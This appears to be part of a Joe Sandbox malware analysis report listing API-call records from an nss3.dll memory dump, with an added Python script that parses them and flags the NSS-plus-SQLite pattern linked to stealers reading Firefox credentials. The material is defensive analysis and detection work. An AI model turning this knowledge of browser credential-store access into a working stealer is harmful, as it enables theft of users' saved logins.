• PR_SetError.NSS3(00000000,00000000), ref: 6C4B1172
• free.MOZGLUE(?), ref: 6C4B1182
• free.MOZGLUE(?), ref: 6C4B11A6
• SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C4B11C5
  • Part of subcall function 6C4B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B52DF
  • Part of subcall function 6C4B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C4B52F3
  • Part of subcall function 6C4B52C0: PR_Unlock.NSS3(?), ref: 6C4B5358
• PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11D3
• PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11F3
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
• String ID:
• API String ID: 1549229083-0
• Opcode ID: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
• Instruction ID: d6707033fdee83706fb600886072264aeeede3056d45eba3eab3fd4dc1cdf00c
• Opcode Fuzzy Hash: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
• Instruction Fuzzy Hash: 436170B4E013459BEB00DF68DC85FAEB7B5AF48348F154128E819BB741EB31E945CBA1
APIs
• TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
• EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
• PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
• memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
• free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
• TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEF1
• free.MOZGLUE(6C49CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C49CDBB,?), ref: 6C4BAF0B
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAF30
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Unlock$CriticalEnterSectionValuefree$memset
• String ID:
• API String ID: 161582014-0
• Opcode ID: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
• Instruction ID: 05a5371851abd9097696b3478568f419cec27d16e6b3231ad0e20b5d94c90a5b
• Opcode Fuzzy Hash: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
• Instruction Fuzzy Hash: 15516CB5A01A01ABDB01DF29D884F5AB7B4BF05319F144668E818ABF11E731F964CBE1
APIs
• TlsGetValue.KERNEL32(?,00000000,00000000,?,6C49AB7F,?,00000000,?), ref: 6C494CB4
• EnterCriticalSection.KERNEL32(0000001C,?,6C49AB7F,?,00000000,?), ref: 6C494CC8
• TlsGetValue.KERNEL32(?,6C49AB7F,?,00000000,?), ref: 6C494CE0
• EnterCriticalSection.KERNEL32(?,?,6C49AB7F,?,00000000,?), ref: 6C494CF4
• PL_HashTableLookup.NSS3(?,?,?,6C49AB7F,?,00000000,?), ref: 6C494D03
• PR_Unlock.NSS3(?,00000000,?), ref: 6C494D10
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• PR_Now.NSS3(?,00000000,?), ref: 6C494D26
  • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
  • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
  • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
• PR_Unlock.NSS3(?,?,00000000,?), ref: 6C494D98
• PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C494DDA
• PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C494E02
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 4032354334-0
• Opcode ID: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
• Instruction ID: dbc52544bf2e53cf3879094097ce7b25eaf0618f0e20efed686690dcee077d6e
• Opcode Fuzzy Hash: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
• Instruction Fuzzy Hash: 1E41E7B9A006119BEB01EF28EC44D667BB8BF1525DF055274EC1987B21FB31E914C7E1
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C47BFFB
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C47C015
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C47C032
• DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C47C04D
  • Part of subcall function 6C4C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4C6A47
  • Part of subcall function 6C4C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C4C6A64
• DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C47C064
• CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C47C07B
  • Part of subcall function 6C478980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C477310), ref: 6C4789B8
  • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C477310), ref: 6C4789E6
  • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C478A00
  • Part of subcall function 6C478980: CERT_CopyRDN.NSS3(00000004,00000000,6C477310,?,?,00000004,?), ref: 6C478A1B
                                                                                                                                                                                                                            • Part of subcall function 6C478980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C478A74
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D2C
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C47C09B,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D3F
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C47C087,00000000,000000B0,?), ref: 6C471D54
                                                                                                                                                                                                                          • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C47C0AD
                                                                                                                                                                                                                          • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C47C0C9
                                                                                                                                                                                                                            • Part of subcall function 6C482DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C47C0D2,6C47C0CE,00000000,-000000D4,?), ref: 6C482DF5
                                                                                                                                                                                                                            • Part of subcall function 6C482DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C47C0CE,00000000,-000000D4,?), ref: 6C482E27
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47C0D6
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47C0E3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3955726912-0
                                                                                                                                                                                                                          • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                          • Instruction ID: d96291ca8283d65bb23e2111cc07ec3aa8bd21dc9474125ec5a8b74af5304087
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5321A1B664010567FB20EAA1AC85FFB32BC9B4175DF084138FD04DA746FB22D91982F2
APIs
• SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
  • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
  • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
  • Part of subcall function 6C4CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
• SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
  • Part of subcall function 6C4CFD80: free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
• TlsGetValue.KERNEL32 ref: 6C472E4E
• EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
• PL_HashTableLookup.NSS3(?), ref: 6C472E71
• PL_HashTableRemove.NSS3(?), ref: 6C472E84
• PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
• PR_Unlock.NSS3 ref: 6C472EA9
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C472EB6
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C472EC5
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
• String ID:
• API String ID: 3332421221-0
• Opcode ID: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
• Instruction ID: 9169e12b6f706f492796311e7c3b0f29afafca67da032e6de53cfc78c40d0d8b
• Opcode Fuzzy Hash: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
• Instruction Fuzzy Hash: 5521F576A44201E7EF219B25EC09EDA3A749B5235EF050034ED1886B11FB32EA59C7E5
APIs
• sqlite3_initialize.NSS3 ref: 6C45FD18
• sqlite3_initialize.NSS3 ref: 6C45FD5F
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD89
• memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD99
• sqlite3_free.NSS3(00000000), ref: 6C45FE3C
• sqlite3_free.NSS3(?), ref: 6C45FEE3
• sqlite3_free.NSS3(?), ref: 6C45FEEE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_initialize$memcpymemset
• String ID: simple
• API String ID: 1130978851-3246079234
• Opcode ID: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
• Instruction ID: e4fd46e6f641e32371c2988382bac3a9784669e99c3b23c9818e64388577747a
• Opcode Fuzzy Hash: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
• Instruction Fuzzy Hash: 029181B0B022058FEB04CF55C880EAAB7B1FF85319F64C568D8199BB52E731E865CB91
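The function records above list, per function in the nss3.dll memory dump, the imported API calls in `Function.MODULE(args), ref: address` form, with nested `Part of subcall function` entries for callees. When triaging a stealer like the ones flagged in this report, an analyst usually wants three things from such listings: a machine-readable call list, the module-relative offset of each `ref` (the dump is based at 6C3F0000, so an IDA database loaded at a different base needs the RVA), and a quick answer to "is this process driving Mozilla NSS plus SQLite", which is the pattern used to read Firefox profile databases. The following Python is an added example, not part of the Joe Sandbox report or any of the detected families; the sample listing is constructed from lines quoted above, and the NSS-plus-SQLite heuristic is the author's assumption, not a rule from the report.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: a handful of API lines copied from the report's nss3.dll records.
# Nested "Part of subcall function" entries describe calls inside the listed callee.
SAMPLE_LISTING = """\
• SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
  • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
  • Part of subcall function 6C4CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
• TlsGetValue.KERNEL32 ref: 6C472E4E
• EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
• PL_HashTableLookup.NSS3(?), ref: 6C472E71
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C472EC5
• sqlite3_initialize.NSS3 ref: 6C45FD18
• sqlite3_free.NSS3(00000000), ref: 6C45FE3C
• sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C465EC9
"""

# "Offset: 6C3F0000" in the Memory Dump Source block is the load base of the dumped module.
DUMP_BASE = 0x6C3F0000

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"   # optional nesting prefix
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"            # Function.MODULE
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"   # optional (args), ref: addr
)


@dataclass(frozen=True)
class ApiCall:
    function: str
    module: str
    args: Tuple[str, ...]
    ref: int                      # virtual address of the call site in the dump
    subcall_of: Optional[int]     # callee address when the line is a nested subcall entry


def parse_listing(text: str) -> List[ApiCall]:
    """Parse Joe Sandbox-style API lines; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m["args"]
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
        callee = int(m["callee"], 16) if m["callee"] else None
        calls.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16), callee))
    return calls


def rva(address: int, base: int = DUMP_BASE) -> int:
    """Module-relative offset, so a ref can be found in an IDB loaded at another base."""
    if address < base:
        raise ValueError("address below module base")
    return address - base


def module_histogram(calls: List[ApiCall]) -> Counter:
    """How many call sites hit each module; NSS3-heavy code is Mozilla crypto/SQLite."""
    return Counter(c.module for c in calls)


def firefox_credential_indicator(calls: List[ApiCall]) -> bool:
    """Heuristic (assumption): NSS item/cert/key routines together with sqlite3_* entry
    points from the same NSS3 module indicate Firefox profile (key4.db/logins) handling."""
    nss_funcs = {c.function for c in calls if c.module == "NSS3"}
    uses_nss_crypto = any(f.startswith(("SECITEM_", "PK11_", "CERT_", "SECKEY_")) for f in nss_funcs)
    uses_sqlite = any(f.startswith("sqlite3_") for f in nss_funcs)
    return uses_nss_crypto and uses_sqlite


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        nested = f" (inside {c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X} rva={rva(c.ref):06X} {c.function}.{c.module}{nested} argc={len(c.args)}")
    print("modules:", dict(module_histogram(parsed)))
    print("firefox credential access pattern:", firefox_credential_indicator(parsed))
```

Run it against the full report text rather than the constructed sample to get the module histogram for every record; the indicator is deliberately conservative and requires both the NSS crypto-side and sqlite3 entry points, because a benign Firefox process also exercises both, so the result is a triage hint about the loaded code, not a verdict on the process.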
APIs
• sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C465EC9
• sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C465EED
Strings
• unable to close due to unfinalized statements or unfinished backups, xrefs: 6C465E64
• API call with %s database connection pointer, xrefs: 6C465EC3
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C465ED1
• invalid, xrefs: 6C465EBE
• %s at line %d of [%.10s], xrefs: 6C465EE0
• misuse, xrefs: 6C465EDB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                          • API String ID: 632333372-1982981357
                                                                                                                                                                                                                          • Opcode ID: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                          • Instruction ID: 8708bf872cec13717263f1a55730c1075aae9207930775d73f988f0fb4397601
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C81BE30B056129BEB19CF66C848FAA7770BF4130DF288269D8155BF9AD730E842CBD1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DDF9
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE68
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE97
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C44DEB6
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DF78
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 1526119172-598938438
                                                                                                                                                                                                                          • Opcode ID: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                          • Instruction ID: 10d36a4a40e43641da74d4cb83dc107e442ab20182d041461ac400cb8fe125c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE8180716047009FE714DF65C880F6A77E1EF85309F24C86DE99A8BB91E731E846CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FCFF3
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FD02B
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C3FB999), ref: 6C3FD041
                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3FB999), ref: 6C54972B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
